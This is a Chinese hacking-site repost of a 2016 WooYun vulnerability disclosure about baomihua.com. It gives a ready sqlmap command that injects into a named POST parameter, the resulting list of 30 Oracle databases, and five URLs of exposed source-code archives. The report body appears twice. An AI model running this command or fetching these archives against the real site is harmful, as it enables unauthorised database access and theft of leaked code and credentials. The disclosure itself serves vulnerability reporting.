记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

2016-03-30 20:40

code 区域
注入点:F:\sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs





数据库30个 可裤裤查询

code 区域
back-end DBMS: Oracle

available databases [30]:

[*] APEX_030200

[*] APPQOSSYS

[*] CHEAT

[*] CHENZH

[*] CTXSYS

[*] DBSNMP

[*] EXFSYS

[*] FLOWS_FILES

[*] LIGZ

[*] LINJS

[*] MDSYS

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] POMOHO

[*] POMOHOMOBILE

[*] QINYM

[*] SCOTT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] WUXG

[*] XDB

[*] XIAL

[*] ZHANGXL

[*] ZHAOLH

[*] ZLY





当前库POMOHO 2449个表 跑的实在太慢了2分钟一个表 跑了2小时才几十个表估算一下要80个小时才可以跑完 这里就证明下危害

123.png





数据库SYS也跑了下 976张表

111.png





数据库OLAPSYS 126张表

111.png





跑了几个数据量大的库证明下危害 表的话要好几天就不深入了



还有几处源代码泄露的

code 区域
1:http://static.baomihua.com/doc.rar

2:http://show.baomihua.com/baomihua.tar.gz

3:http://resources.baomihua.com/swf.rar

4:http://reg.baomihua.com/reg.rar

5:http://pvstat.baomihua.com/wwwroot.rar





导致敏感信息泄露配置文件等等 艾米直播网站的

121.png



邮箱服务器信息

21.png



数据库配置信息

123.png



这边没装打不开配置文件

123.png



漏洞证明:

code 区域
注入点:F:\sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs





数据库30个 可裤裤查询

code 区域
back-end DBMS: Oracle

available databases [30]:

[*] APEX_030200

[*] APPQOSSYS

[*] CHEAT

[*] CHENZH

[*] CTXSYS

[*] DBSNMP

[*] EXFSYS

[*] FLOWS_FILES

[*] LIGZ

[*] LINJS

[*] MDSYS

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] POMOHO

[*] POMOHOMOBILE

[*] QINYM

[*] SCOTT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] WUXG

[*] XDB

[*] XIAL

[*] ZHANGXL

[*] ZHAOLH

[*] ZLY





当前库POMOHO 2449个表 跑的实在太慢了2分钟一个表 跑了2小时才几十个表估算一下要80个小时才可以跑完 这里就证明下危害

123.png





数据库SYS也跑了下 976张表

111.png





数据库OLAPSYS 126张表

111.png





跑了几个数据量大的库证明下危害 表的话要好几天就不深入了



还有几处源代码泄露的

code 区域
1:http://static.baomihua.com/doc.rar

2:http://show.baomihua.com/baomihua.tar.gz

3:http://resources.baomihua.com/swf.rar

4:http://reg.baomihua.com/reg.rar

5:http://pvstat.baomihua.com/wwwroot.rar





导致敏感信息泄露配置文件等等 艾米直播网站的

121.png



邮箱服务器信息

21.png



数据库配置信息

123.png



这边没装打不开配置文件

123.png



修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2016-0188855

阅读:36258 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云